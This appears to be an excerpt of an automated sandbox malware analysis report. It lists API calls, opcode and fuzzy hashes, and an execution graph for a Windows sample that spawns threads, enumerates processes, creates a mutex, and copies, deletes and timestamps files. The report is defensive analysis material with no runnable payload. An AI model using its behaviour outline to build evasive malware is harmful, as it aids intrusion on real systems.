                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                    • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                                    • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                                    • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                                    Function 00401922 Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                    • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                                    • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                                    • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                                    Function 0040192B Relevance: 1.3, APIs: 1, Instructions: 36sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                    • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                                    • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                                    • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                                    Function 0040193C Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                    • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                                                    • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                    • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                                    Function 00401932 Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                    • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                                    • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                    • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                                    Function 00418740 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocLocal
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3494564517-0
                                                                                                                    • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                    • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                    • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                    • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10

                                                                                                                    Non-executed Functions

                                                                                                                    Function 005E092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .$GetProcAddress.$l
                                                                                                                    • API String ID: 0-2784972518
                                                                                                                    • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                    • Instruction ID: 81c2925e89bdf666cdb0646dd3adc5f1af4359d47b30a98dde1142d258809ff2
                                                                                                                    • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                    • Instruction Fuzzy Hash: FE318DB6900609CFDB14CF99C880AAEBBF5FF48324F14504AD441E7352D7B1EA85CBA4
                                                                                                                    Function 004020EA Relevance: 1.7, APIs: 1, Instructions: 209COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                                    • Instruction ID: 1fe14f3d08a5ad6b2b8af3127fa4f425e7ffb0c359c280517f11db711c116789
                                                                                                                    • Opcode Fuzzy Hash: 18f97d7e3c198c930df0e1e3726df986428e5bed6b78be6737e9bf24f670245c
                                                                                                                    • Instruction Fuzzy Hash: 0A716C32400264DADB28EFBCC6CAE557370FB02F00B550BB6C5812F58ADB75B6198B96
                                                                                                                    Function 0040332A Relevance: 1.4, Strings: 1, Instructions: 124COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: us<
                                                                                                                    • API String ID: 0-3812821218
                                                                                                                    • Opcode ID: 308e0de05fb1414eaad262c19b90270c30373029b4f8ecd9a4105f675d28d4fe
                                                                                                                    • Instruction ID: 620728a3fa2a34273f960e8624460b3ff27e753c36e61949abd3c72be656f3e6
                                                                                                                    • Opcode Fuzzy Hash: 308e0de05fb1414eaad262c19b90270c30373029b4f8ecd9a4105f675d28d4fe
                                                                                                                    • Instruction Fuzzy Hash: E541125280D7C08ED7235F3849964663F78AE17312B0901EFC891AA6E7D67C9E0AC35A
                                                                                                                    Function 0067FD9C Relevance: .1, Instructions: 61COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0067D000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_67d000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                    • Instruction ID: 0402723631d47c2327ed075c761917cdbd163f041e8e8a4d82b8b6fd244f9dc8
                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                    • Instruction Fuzzy Hash: 9F115B72340100AFDB54DF55DC91FA673EAEB89320B298569ED09CB326E675EC42CB60
                                                                                                                    Function 00402379 Relevance: .1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                                    • Instruction ID: e7a2f1e1f2d18035c496875c0c2bba996cc0d18765e75913e3c7fd8bcbe23822
                                                                                                                    • Opcode Fuzzy Hash: 14c91299fc0d5ea6405d973304b2732cfb05cef970dc5b42c380558f1c3c8a50
                                                                                                                    • Instruction Fuzzy Hash: CA11533600420ADFD715EE219A89AA9BB21FB45704B5400BADE562B0C2A2BD7123970B
                                                                                                                    Function 0040237B Relevance: .1, Instructions: 59COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                                    • Instruction ID: d9f06ca26037506423ecc87bc330270b3b45d0e2ffab50e6a8e269eb556b0e13
                                                                                                                    • Opcode Fuzzy Hash: 5ecd1a4c209d5f5235aa5223a66586c749e58f70271c2d5c11b30b858281451a
                                                                                                                    • Instruction Fuzzy Hash: 7411533640820ADFD715EE21AA89AA6BB31FB45704F5400BBDE562B0C1E2BD7123D74B
                                                                                                                    Function 00402387 Relevance: .1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                                    • Instruction ID: 8ab6e973ac2bde56534b905b9a6112487ad567182bc04a9cefd4a17b3c0f3d42
                                                                                                                    • Opcode Fuzzy Hash: 2c29bc3172a4a75054b17bc2abf467eb46d0d52112e2b03bc1234d3f1f3eeaba
                                                                                                                    • Instruction Fuzzy Hash: A6113636504206CFDB15DF20D9895A8B722FB45704B1400BACE522B0C1E37D7113D70B
                                                                                                                    Function 00402397 Relevance: .1, Instructions: 52COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                                    • Instruction ID: 10c1f8c9815bd1bae344db256f26ecf9b321a2c49f9f40fa9571263b21f216dd
                                                                                                                    • Opcode Fuzzy Hash: c2fb1fcd810030a7c701492efe6b1583806f24c29ad391e8378491e72e53c4f9
                                                                                                                    • Instruction Fuzzy Hash: 17113636404206CFD715DF10AA895A8B721BB55704B14007ACE521B0C1A3BD6113970B
                                                                                                                    Function 0040239B Relevance: .0, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                    • Instruction ID: f3401649f1529dc56ca8e0e6371485d35b9042d0b2056da4c8f47593e1f5965b
                                                                                                                    • Opcode Fuzzy Hash: ad580f4852e8641318215a16f7c63f70c318642c86c98d9f634171b4294914d4
                                                                                                                    • Instruction Fuzzy Hash: 7701263644420ACFDB1AEF11E9896E8B732FB55704B5401BACE565B0C1E37D6113D70B
                                                                                                                    Function 0040239E Relevance: .0, Instructions: 45COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                    • Instruction ID: ab8b863e00b9434e1dbf8970a3beebb42fa128e0550c32edf730788d57ebd560
                                                                                                                    • Opcode Fuzzy Hash: 0d17a2e63e4f1915686b689582fba0273351ae16582c8cdc9572b60fe9b5c197
                                                                                                                    • Instruction Fuzzy Hash: 1001263640434ACFCB16EF11E9895E4BB32BF45708B4801A6CE565B092E3793122D70B
                                                                                                                    Function 005E0D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_5e0000_RmbF3635xY.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                    • Instruction ID: e79c77a33d3e2958be64fda7cb60edd6142e77e0db177738c83660cdaacb83ea
                                                                                                                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                    • Instruction Fuzzy Hash: 1E01F272A006408FDF25DF61CD04BAB37E9FB86306F0544B4D94AD72C2E3B0A8818F80
                                                                                                                    Function 004189D0 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                                    • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2776817195-0
                                                                                                                    • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                    • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                                    • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                    • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                                    Function 00418950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 2991353152-2547889144
                                                                                                                    • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                    • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                                    • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                    • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:39.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                    Signature Coverage:3.5%
                                                                                                                    Total number of Nodes:201
                                                                                                                    Total number of Limit Nodes:21
                                                                                                                    execution_graph 2605 85819b8 2606 85819c9 2605->2606 2607 8581952 2605->2607 2608 8581a03 2606->2608 2610 8581a10 2606->2610 2611 8581a60 7 API calls 2610->2611 2612 8581a22 2611->2612 2613 8581a3d 2612->2613 2614 8581a2b SleepEx 2612->2614 2613->2608 2614->2614 2615 8581a3b 2614->2615 2616 8582254 2 API calls 2615->2616 2617 8581a50 2616->2617 2618 8581e1c 9 API calls 2617->2618 2619 8581a58 2618->2619 2620 29919b8 2621 29919c9 2620->2621 2622 2991952 2620->2622 2625 2991a10 2621->2625 2626 2991a60 12 API calls 2625->2626 2627 2991a22 2626->2627 2628 2991a03 2627->2628 2629 2991a2b SleepEx 2627->2629 2629->2629 2630 2991a3b 2629->2630 2631 2992254 2 API calls 2630->2631 2632 2991a50 2631->2632 2633 2991e1c 21 API calls 2632->2633 2634 2991a58 2633->2634 2635 29917fb 2636 2991827 2635->2636 2637 2991901 2636->2637 2638 2991a10 36 API calls 2636->2638 2638->2637 2639 85817fb 2640 8581827 2639->2640 2641 8581944 2640->2641 2642 8581a10 19 API calls 2640->2642 2643 8581a03 2642->2643 2401 8581a10 2411 8581a60 2401->2411 2404 8581a3d 2405 8581a2b SleepEx 2405->2405 2406 8581a3b 2405->2406 2418 8582254 2406->2418 2413 8581a97 2411->2413 2412 8581a22 2412->2404 2412->2405 2413->2412 2414 8581b60 RtlCreateHeap 2413->2414 2415 8581b91 2414->2415 2415->2412 2416 8581d10 CreateThread 2415->2416 2417 8581d41 CreateThread 2416->2417 2436 8583c84 2416->2436 2417->2412 2433 8583d60 2417->2433 2419 8582272 2418->2419 2441 8584ad0 2419->2441 2421 8581a50 2422 8581e1c 2421->2422 2447 8584d20 2422->2447 2424 8581e57 2425 8581e88 CreateMutexExA 2424->2425 2426 8581ea2 2425->2426 2451 8581f94 2426->2451 2431 8581f4e 2455 85822fc 2431->2455 2461 8582d60 2431->2461 2434 8583d72 EnumWindows SleepEx 2433->2434 2435 8583d96 2433->2435 2434->2434 2434->2435 2437 8583d3b 2436->2437 2438 8583ca1 CreateToolhelp32Snapshot 2436->2438 2439 8583d23 SleepEx 2438->2439 2440 8583cb5 2438->2440 2439->2437 2439->2438 2440->2439 2442 8584af9 2441->2442 2443 8584b0d GetTokenInformation 2442->2443 2446 8584b6a 2442->2446 2444 8584b38 2443->2444 2445 8584b42 GetTokenInformation 2444->2445 2445->2446 2446->2421 2448 8584d4d GetVolumeInformationA 2447->2448 2450 8584da0 2448->2450 2450->2424 2452 8581fb7 2451->2452 2453 8581f0d CreateFileMappingA 2452->2453 2454 85820eb CreateFileW 2452->2454 2453->2431 2454->2453 2456 858232d 2455->2456 2464 858337c CreateFileW 2456->2464 2458 8582342 2466 858239c 2458->2466 2460 8582353 2460->2431 2462 858337c CreateFileW 2461->2462 2463 8582d83 2462->2463 2463->2431 2465 85833d1 2464->2465 2465->2458 2467 85823ef 2466->2467 2468 85826fc DeleteFileW DeleteFileW 2467->2468 2471 8582789 2467->2471 2469 858271e 2468->2469 2470 8582765 SleepEx RtlExitUserThread 2469->2470 2470->2471 2471->2460 2472 2991a10 2482 2991a60 2472->2482 2475 2991a3d 2476 2991a2b SleepEx 2476->2476 2477 2991a3b 2476->2477 2488 2992254 2477->2488 2484 2991a97 2482->2484 2483 2991a22 2483->2475 2483->2476 2484->2483 2485 2991b60 RtlCreateHeap 2484->2485 2486 2991b91 2485->2486 2486->2483 2487 2991d10 CreateThread CloseHandle CreateThread CloseHandle 2486->2487 2487->2483 2505 2993d60 2487->2505 2508 2993c84 2487->2508 2489 2992272 2488->2489 2516 2994ad0 2489->2516 2491 2991a50 2492 2991e1c 2491->2492 2522 2994d20 2492->2522 2494 2991e57 2495 2991e88 CreateMutexExA 2494->2495 2496 2991ea2 2495->2496 2526 2994e90 2496->2526 2498 2991ee1 2531 2991f94 2498->2531 2503 2991f4e 2543 29922fc 2503->2543 2549 2992d60 2503->2549 2506 2993d72 EnumWindows SleepEx 2505->2506 2507 2993d96 2505->2507 2506->2506 2506->2507 2509 2993d3b 2508->2509 2510 2993ca1 CreateToolhelp32Snapshot 2508->2510 2511 2993d23 SleepEx 2510->2511 2512 2993cb5 Process32First 2510->2512 2511->2509 2511->2510 2514 2993ccd 2512->2514 2513 2993d1a CloseHandle 2513->2511 2514->2513 2515 2993d08 Process32Next 2514->2515 2515->2514 2517 2994af9 2516->2517 2518 2994b0d GetTokenInformation 2517->2518 2521 2994b6a 2517->2521 2519 2994b38 2518->2519 2520 2994b42 GetTokenInformation 2519->2520 2520->2521 2521->2491 2523 2994d4d GetVolumeInformationA 2522->2523 2525 2994da0 2523->2525 2525->2494 2529 2994eb2 2526->2529 2527 2994f6e ObtainUserAgentString 2527->2498 2528 2994ef3 RegQueryValueExA 2528->2529 2529->2528 2530 2994f46 2529->2530 2530->2527 2533 2991fb7 2531->2533 2532 2991f0d CreateFileMappingA 2532->2503 2533->2532 2534 299201b DeleteFileW CopyFileW 2533->2534 2542 29920ce 2533->2542 2534->2532 2535 299203b DeleteFileW 2534->2535 2538 2992051 2535->2538 2537 29920eb CreateFileW 2537->2532 2539 2992086 DeleteFileW 2538->2539 2540 299209a 2539->2540 2558 29949b0 2540->2558 2552 2993520 2542->2552 2544 299232d 2543->2544 2565 299337c CreateFileW 2544->2565 2546 2992342 2567 299239c 2546->2567 2548 2992353 2548->2503 2550 299337c CreateFileW 2549->2550 2551 2992d83 2550->2551 2551->2503 2553 2993541 2552->2553 2554 2993561 GetUserNameW 2553->2554 2555 2993582 2554->2555 2563 2993678 CoCreateInstance 2555->2563 2557 299359d 2557->2537 2559 29949d7 2558->2559 2560 29949f7 SetFileAttributesW CreateFileW 2559->2560 2561 2994a42 SetFileTime 2560->2561 2562 2994a63 2561->2562 2562->2542 2564 29936d6 2563->2564 2564->2557 2566 29933d1 2565->2566 2566->2546 2591 2993e70 2567->2591 2569 2992648 2572 29926e7 2569->2572 2573 2992789 2569->2573 2586 2992660 2569->2586 2570 299282d 2571 2993e70 RtlReAllocateHeap 2570->2571 2577 2992854 2571->2577 2575 29926fc DeleteFileW DeleteFileW 2572->2575 2581 29927ec 2572->2581 2574 2993e70 RtlReAllocateHeap 2573->2574 2580 29927b0 2574->2580 2576 299271e 2575->2576 2579 2993e70 RtlReAllocateHeap 2576->2579 2578 29928d0 RtlReAllocateHeap 2577->2578 2577->2581 2578->2581 2582 2992748 2579->2582 2580->2581 2583 29928d0 RtlReAllocateHeap 2580->2583 2581->2548 2585 2992765 SleepEx RtlExitUserThread 2582->2585 2583->2581 2584 2993e70 RtlReAllocateHeap 2584->2586 2585->2581 2586->2572 2586->2581 